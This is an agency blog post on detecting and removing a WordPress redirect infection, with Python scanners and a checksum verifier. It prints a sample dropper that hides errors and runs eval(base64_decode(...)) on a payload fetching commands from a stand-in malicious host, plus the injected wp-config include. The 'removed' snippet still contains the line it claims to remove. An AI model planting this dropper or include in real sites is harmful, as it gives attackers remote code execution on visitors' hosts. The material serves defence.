How We Detected and Removed Malware from a Client’s WordPress Site After a Malicious Redirect


Recently, we encountered a severe security breach on a client’s WordPress site, where visitors were being redirected to malicious websites. After a thorough investigation, we found that a hacker had injected malware directly into the WordPress core files. In this blog post, we’ll walk you through what happened, the code responsible for the attack, and the steps we took to clean up the site and secure it for the future.

Symptoms of the Attack

The client first noticed the problem when users reported being redirected to suspicious websites. The site’s SEO performance also began to drop, as search engines flagged it for harmful behavior. It was clear that the site had been compromised by malware, likely intended to steal traffic or infect users with malicious content.

How We Found the Malware

Our investigation started by examining the site’s critical WordPress files, focusing particularly on wp-config.php and the core wp-includes directory, as these are common targets for attackers.

While inspecting the wp-config.php file, we found a suspicious line that had been added to the configuration file:

[php]
include_once(ABSPATH . WPINC . '/header.php');
[/php]

This line instructs WordPress to include and execute code from a header.php file located in the wp-includes directory. WordPress does not ship a header.php file in that directory (theme header.php files live under wp-content/themes), which immediately raised a red flag. The attacker created this file to hold malicious code that would run every time a page on the site was loaded, since wp-config.php is executed on every request.

Analyzing the Malicious Code

When we checked the contents of the wp-includes/header.php file, we discovered it was designed to:

  • Redirect visitors to external malicious websites.
  • Execute remote code by fetching additional payloads from the attacker’s server.
  • Create a backdoor that allowed the attacker to regain access, even if their code was removed.

This type of attack is particularly dangerous because it compromises both the site owner’s reputation and the security of visitors.

Here’s a simplified example of what the code in header.php might have looked like:

[php]
<?php
// Suppress errors to avoid detection
@ini_set('display_errors', 0);
error_reporting(0);

// Base64-encoded payload used to hide malicious code
$payload = "Z2V0X2ZpbGVfY29udGVudHMoJ2h0dHBzOi8vbWFsaWNpb3VzLXNpdGUuY29tL2NvbW1hbmQuanNvbicpOw==";

// Decode and execute the payload
eval(base64_decode($payload));
?>
[/php]

In this case, the eval() function executes code that has been base64-encoded, which makes the payload harder for signature-based security software to detect. The encoded string could contain anything, but it often includes commands to download further malware or redirect users to another site.
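As an added example (not code from the original post), the following Python scanner looks for the three indicators described above: an include of a wp-includes file from wp-config.php, error suppression, and eval(base64_decode(...)). Long base64 literals are decoded for inspection only, never executed; the patterns and the sample site it builds are constructed for this illustration.

```python
import base64
import re
from pathlib import Path

# Indicators taken from the incident above; the regexes themselves are constructed.
EVAL_B64 = re.compile(r"eval\s*\(\s*base64_decode\s*\(")
HIDE_ERRORS = re.compile(r"@?ini_set\s*\(\s*['\"]display_errors['\"]\s*,\s*0\s*\)")
# wp-config.php never includes files from wp-includes; the real bootstrap is wp-settings.php.
WPINC_INCLUDE = re.compile(r"include(?:_once)?\s*\(\s*ABSPATH\s*\.\s*WPINC\s*\.\s*['\"]/([\w.-]+)['\"]")
B64_LITERAL = re.compile(r"['\"]([A-Za-z0-9+/]{40,}={0,2})['\"]")

def decode_literals(text):
    """Decode long base64 string literals so an analyst can read them; nothing is executed."""
    decoded = []
    for m in B64_LITERAL.finditer(text):
        try:
            decoded.append(base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace"))
        except ValueError:  # not valid base64, skip it
            continue
    return decoded

def scan_file(path):
    text = path.read_text(errors="replace")
    hits = []
    if EVAL_B64.search(text):
        hits.append("eval(base64_decode(...))")
    if HIDE_ERRORS.search(text):
        hits.append("display_errors suppressed")
    if path.name == "wp-config.php":
        for m in WPINC_INCLUDE.finditer(text):
            hits.append(f"wp-config.php includes wp-includes/{m.group(1)}")
    return {"file": str(path), "name": path.name, "hits": hits,
            "decoded": decode_literals(text) if hits else []}

def scan_tree(root):
    """Findings for every .php file under root that triggers at least one indicator."""
    return [r for r in (scan_file(p) for p in Path(root).rglob("*.php")) if r["hits"]]

def build_sample(root):
    """Constructed mini site: the injected wp-config.php line, the dropper, one clean file."""
    root = Path(root)
    (root / "wp-includes").mkdir(parents=True, exist_ok=True)
    (root / "wp-config.php").write_text(
        "<?php\ninclude_once(ABSPATH . WPINC . '/header.php');\nrequire_once ABSPATH . 'wp-settings.php';\n")
    (root / "wp-includes" / "header.php").write_text(
        "<?php\n@ini_set('display_errors', 0);\nerror_reporting(0);\n"
        "$payload = \"Z2V0X2ZpbGVfY29udGVudHMoJ2h0dHBzOi8vbWFsaWNpb3VzLXNpdGUuY29tL2NvbW1hbmQuanNvbicpOw==\";\n"
        "eval(base64_decode($payload));\n")
    (root / "wp-includes" / "version.php").write_text("<?php\n$wp_version = '6.5';\n")
    return root

if __name__ == "__main__":
    import tempfile
    with tempfile.TemporaryDirectory() as d:
        for finding in scan_tree(build_sample(d)):
            print(finding)
```

Run it against a real document root by calling scan_tree(path) and review the decoded literals by hand; a single hit is a lead, not proof.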

How We Cleaned the Infection

1. Removing the Malicious Code

We started by removing the malicious include_once line from the wp-config.php file:

[php]
<?php
// Removed this line to prevent loading malicious code
include_once(ABSPATH . WPINC . '/header.php');
?>
[/php]

Next, we deleted the header.php file from the wp-includes directory, as this file was not part of the official WordPress installation and contained the malicious payload.

2. Checking for Additional Backdoors

Malware infections often come with multiple backdoors, so we searched the site’s directories for other suspicious files. We used the following terminal command to find any other hidden files or recently modified files:

[sourcecode language="plain"]
# the parentheses group the two tests so -type f applies to both branches;
# without them, "-o -mtime -30" also matches directories and is not limited to files
find . -type f \( -name ".*" -o -mtime -30 \)
[/sourcecode]

This command helped us identify any files modified in the last 30 days and any hidden files (starting with a dot .) that attackers might have placed.

3. Verifying WordPress Core Integrity

We used the WP-CLI core verify-checksums command to verify the integrity of the core files. It compares every core file against the official checksums for the installed version and tells us whether any file has been tampered with and needs to be replaced:

[sourcecode language="plain"]
wp core verify-checksums
[/sourcecode]

Any core files that were modified were replaced with clean versions from the official WordPress repository.
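The check above works by hashing each core file and comparing it with a published manifest. As an added example (not the WP-CLI code itself), this Python function does the same thing offline against a constructed manifest, and also reports files under wp-includes that are not in the manifest at all, which is exactly where the attacker's header.php would surface.

```python
import hashlib
from pathlib import Path

# Constructed stand-in for the official per-version checksum manifest
# (relative path -> MD5 of the clean file content).
CLEAN_FILES = {
    "wp-includes/version.php": "<?php\n$wp_version = '6.5';\n",
    "wp-includes/load.php": "<?php\n// clean core file (constructed)\n",
    "index.php": "<?php\nrequire __DIR__ . '/wp-blog-header.php';\n",
}
MANIFEST = {name: hashlib.md5(body.encode()).hexdigest() for name, body in CLEAN_FILES.items()}

def verify_core(root, manifest):
    """Return modified, missing and unexpected (present but not in the manifest) core files."""
    root = Path(root)
    modified, missing = [], []
    for rel, expected in manifest.items():
        p = root / rel
        if not p.is_file():
            missing.append(rel)
        elif hashlib.md5(p.read_bytes()).hexdigest() != expected:
            modified.append(rel)
    # Anything extra under wp-includes/ is not part of core and deserves a look.
    unexpected = sorted(
        str(p.relative_to(root)).replace("\\", "/")
        for p in (root / "wp-includes").rglob("*")
        if p.is_file() and str(p.relative_to(root)).replace("\\", "/") not in manifest)
    return {"modified": modified, "missing": missing, "unexpected": unexpected}

def build_tampered_site(root):
    """Constructed site: one core file with an appended line and a dropped header.php."""
    root = Path(root)
    for rel, body in CLEAN_FILES.items():
        (root / rel).parent.mkdir(parents=True, exist_ok=True)
        (root / rel).write_text(body)
    with (root / "wp-includes/load.php").open("a") as f:
        f.write("// tampered line (constructed)\n")
    (root / "wp-includes/header.php").write_text("<?php\n// dropped file (constructed)\n")
    return root

if __name__ == "__main__":
    import tempfile
    with tempfile.TemporaryDirectory() as d:
        print(verify_core(build_tampered_site(d), MANIFEST))
```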

4. Updating Passwords and Credentials

Because the attacker had gained access to the server, we took the following steps to secure the site:

  • Updated all passwords (WordPress admin, database, FTP).
  • Updated the database credentials in wp-config.php to ensure the attacker could no longer access the database.
  • Enabled two-factor authentication (2FA) for WordPress logins to add an extra layer of security.

5. Hardening WordPress Security

To prevent future attacks, we took several steps to harden the WordPress installation:

  • Installed a security plugin like Wordfence or iThemes Security to monitor for malicious activity.
  • Disabled file editing within the WordPress dashboard by adding the following line to wp-config.php:

[php]
define('DISALLOW_FILE_EDIT', true);
[/php]

  • Ensured that all themes, plugins, and WordPress core were up to date.

6. Monitoring for Future Attacks

Finally, we set up monitoring to track any further suspicious behavior. We also set up regular backups so that if anything happens in the future, we can restore the site quickly.

Conclusion

This incident was a clear reminder that website security should never be taken lightly. Malware infections like this not only hurt SEO and user trust but can also lead to data breaches. By regularly monitoring your site, keeping everything up to date, and using security best practices, you can minimize the chances of an attack.

If your site has been compromised or you’re seeing strange redirects, don’t wait! Take action immediately to clean your site and prevent further damage. If you’re unsure how to proceed, seek professional help to ensure everything is properly cleaned and secured.

Stay safe and secure!

Need help with your WordPress security? Contact us today for a comprehensive security audit and cleanup service.
